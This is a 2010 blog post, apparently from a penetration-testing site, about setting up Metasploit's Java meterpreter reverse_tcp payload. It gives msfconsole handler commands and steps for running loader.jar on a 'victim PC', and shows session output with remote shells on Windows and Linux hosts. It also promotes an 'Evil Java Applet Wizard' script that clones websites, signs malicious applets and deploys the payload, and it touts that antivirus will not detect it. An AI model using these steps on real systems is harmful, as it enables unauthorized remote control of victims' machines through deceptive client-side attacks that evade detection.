Metasploit Java Meterpreter Payload

If you haven't noticed, the Metasploit Framework has had a Java meterpreter payload for some time now.

It supports all the commands supported by the PHP meterpreter, as of SVN revision 9777, and additionally the ipconfig, route, and screenshot commands.

It is not fully implemented into the framework yet and in order to get it up and running some manual tweaking is needed.

In this post I will show how to set it up and use it.

Furthermore, I have recreated my “Evil Java Applet Wizard” script to automate the process of getting it up and running.

The script now supports a full Java attack: it combines the client-side applet attack with the Java meterpreter payload instead of a binary executable.

Registered members can download the script at the end of this post (script updated Aug 17).

Why use a Java meterpreter, you ask?

Well…you’ll see later…

Requirements:

JRE 1.2 on the victim machine is enough, although some features, like routing tables or screenshots, require JRE 1.3, JRE 1.4 or JRE 1.6.

You can find the Java meterpreter payload jar file in:

"/pentest/exploits/framework3/data/java/loader.jar"

You will also need the “JavaMeterpreter.zip” file which you can download from HERE

Update: I have just noticed that the manual tweaking is no longer necessary; the Metasploit Framework now has the Java meterpreter listener built in.

That means you can skip steps 1 to 4 and, instead of using the patched PHP meterpreter, use the Java meterpreter payload directly.

I have also updated the script to use the java payload as well.


=[ metasploit v3.4.2-dev [core:3.4 api:1.0]
+ -- --=[ 578 exploits - 297 auxiliary
+ -- --=[ 212 payloads - 27 encoders - 8 nops
=[ svn r10024 updated today (2010.08.17)

msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD java/meterpreter/reverse_tcp
PAYLOAD => java/meterpreter/reverse_tcp
msf exploit(handler) > show options

Module options:

Name  Current Setting  Required  Description
----  ---------------  --------  -----------

Payload options (java/meterpreter/reverse_tcp):

Name   Current Setting  Required  Description
----   ---------------  --------  -----------
LHOST                   yes       The listen address
LPORT  4444             yes       The listen port

Exploit target:

Id  Name
--  ----
0   Wildcard Target

msf exploit(handler) >

Let's see how to set it up manually...

1. Download

root@Blackbox:~# cd /tmp/
root@Blackbox:/tmp# wget https://www.metasploit.com/redmine/attachments/397/JavaMeterpreter.zip --no-check-certificate

2. Unzip

root@Blackbox:/tmp# unzip JavaMeterpreter.zip

3. Copy necessary files

root@Blackbox:/tmp# cd extensions/
root@Blackbox:/tmp/extensions# cp {ext_server_stdapi.jar,meterpreter.jar} /pentest/exploits/framework3/data/meterpreter

4. Back up the PHP Meterpreter files and rename the jar files to the .php extension (this will break PHP Meterpreter support)

root@Blackbox:/tmp/extensions# cd /pentest/exploits/framework3/data/meterpreter

root@Blackbox:/pentest/exploits/framework3/data/meterpreter# mv meterpreter.php meterpreter.phpx

root@Blackbox:/pentest/exploits/framework3/data/meterpreter# mv ext_server_stdapi.php ext_server_stdapi.phpx

root@Blackbox:/pentest/exploits/framework3/data/meterpreter# mv meterpreter.jar meterpreter.php

root@Blackbox:/pentest/exploits/framework3/data/meterpreter# mv ext_server_stdapi.jar ext_server_stdapi.php
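After step 4 the files named *.php in data/meterpreter are really JARs, so it is easy to lose track of which copy is which. The check below is an added example (not from the post and not part of Metasploit); it assumes the framework path the post uses and the fact that every JAR, being a ZIP, starts with the bytes PK\x03\x04, and it reports each file's real type so you can confirm the swap or restore the .phpx backups:

```shell
#!/bin/sh
# Added example: classify the meterpreter extension files by content, not by
# extension. Path is the one used in the post (override via METERPRETER_DIR).
METERPRETER_DIR="${METERPRETER_DIR:-/pentest/exploits/framework3/data/meterpreter}"

# Print "jar", "php" or "other" for the file $1, judged by its first bytes.
# od -c renders the ZIP local-file header PK\003\004 as "P K 003 004".
file_kind() {
    magic=$(head -c 5 "$1" 2>/dev/null | od -An -c | tr -d ' \n')
    case "$magic" in
        PK003004*) echo jar ;;
        '<?php'*)  echo php ;;
        *)         echo other ;;
    esac
}

# One line per meterpreter.php*/ext_server_stdapi.php* file in $1: "<kind>\t<path>".
report_dir() {
    for f in "$1"/meterpreter.php* "$1"/ext_server_stdapi.php*; do
        [ -f "$f" ] || continue
        printf '%s\t%s\n' "$(file_kind "$f")" "$f"
    done
}

# Stand-alone use: report the real framework directory if it exists.
if [ -d "$METERPRETER_DIR" ]; then
    report_dir "$METERPRETER_DIR"
fi
```

A line reading "php" for meterpreter.phpx and "jar" for meterpreter.php means step 4 went as intended; two "php" lines mean the rename was not applied.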

5. Launch msfconsole and set up a multi/handler listener with the "php/meterpreter/reverse_tcp" payload.

root@Blackbox:/pentest/exploits/framework3/data/meterpreter# cd ..
root@Blackbox:/pentest/exploits/framework3/data# cd ..
root@Blackbox:/pentest/exploits/framework3# ./msfconsole

=[ metasploit v3.4.2-dev [core:3.4 api:1.0]
+ -- --=[ 577 exploits - 295 auxiliary
+ -- --=[ 212 payloads - 27 encoders - 8 nops
=[ svn r9993 updated today (2010.08.13)

msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD php/meterpreter/reverse_tcp
PAYLOAD => php/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 0.0.0.0
LHOST => 0.0.0.0
msf exploit(handler) > set LPORT 4444
LPORT => 4444
msf exploit(handler) > exploit

[*] Started reverse handler on 0.0.0.0:4444
[*] Starting the payload handler...

6. Copy (transfer) “/pentest/exploits/framework3/data/java/loader.jar” to the victim PC and run it as follows:

C:\Documents and Settings\NightRanger>java -jar loader.jar
Usage: java -jar loader.jar   []
C:\Documents and Settings\NightRanger>java -jar loader.jar 192.168.1.104 4444

7. Get your Java Meterpreter shell:

[*] Sending stage (21717 bytes) to 192.168.1.106
[*] Meterpreter session 1 opened (192.168.1.104:4444 -> 192.168.1.106:1435) at Sat Aug 14 20:34:57 +0300 2010

meterpreter > sysinfo
Computer: exploit
OS      : Windows XP 5.1 (x86)
meterpreter > getuid
Server username: NightRanger
meterpreter >

P.S:

The Java meterpreter works on Linux systems as well:

root@Blackbox:/pentest/exploits/framework3/data/java# java -jar loader.jar 192.168.1.104 4444
meterpreter > exit

[*] Meterpreter session 1 closed.  Reason: User exit
msf exploit(handler) > rexploit

[*] Started reverse handler on 0.0.0.0:4444
[*] Starting the payload handler...
[*] Sending stage (21717 bytes) to 192.168.1.104
[*] Meterpreter session 2 opened (192.168.1.104:4444 -> 192.168.1.104:59806) at Sat Aug 14 20:47:40 +0300 2010

meterpreter > sysinfo
Computer: Blackbox
OS      : Linux 2.6.34 (i386)
meterpreter > getuid
Server username: root
meterpreter >

I have modified my “Evil Java Applet Wizard” script to use the Java Meterpreter payload instead of a binary executable.

The reasons for that are:

1. Antivirus software will not detect the Java Meterpreter as a malicious file (as you can see in the demo video below).

2. It makes sense to use the Java Meterpreter payload if you are already using the Java applet client-side attack vector.

If the applet attack worked, the victim has Java installed on his system, which is exactly what this payload needs.

Demo:

Metasploit JAVA Meterpreter from NightRanger on Vimeo.

Script requirements are:

#!/usr/bin/python

'''
Created on Jul 4, 2010
Code Updated on Aug 17, 2010

@Author: NightRanger, http://exploit.co.il

This script is designed and tested on BackTrack 4 final with metasploit v3.4.2-dev

Requirements:

JAVA JDK: Install using: "apt-get install sun-java6-jdk"
Meterpreter JAVA Payload (loader.jar) must exist in: "/pentest/exploits/framework3/data/java/loader.jar"

Script features:
----------------

- Generates java applet code on the fly
- Generates Keystore / Keystore Removal
- Compiles applet code
- Packages and signs the JAR file
- Web site cloning
- Generates applet html code
- Creates a meterpreter JAVA payload
- Starts apache web server
- Starts MSFConsole listener

* Java applet source code found in the wild, decompiled and tweaked.
* Website clone wget syntax taken from SET.
'''

Download the script:

The script is designed for attacking Windows operating systems.

jaw.tar.gz (Java Applet Wizard, 4 kB; registered members only)

References:

https://www.metasploit.com/redmine/issues/406

http://schierlm.users.sourceforge.net/JavaPayload/

http://www.metasploit.com/modules/payload/java/meterpreter/reverse_tcp

http://seclists.org/metasploit/2010/q3/134


Comments

  1. LowValueTarget
    Aug 16, 2010

    Good Stuff!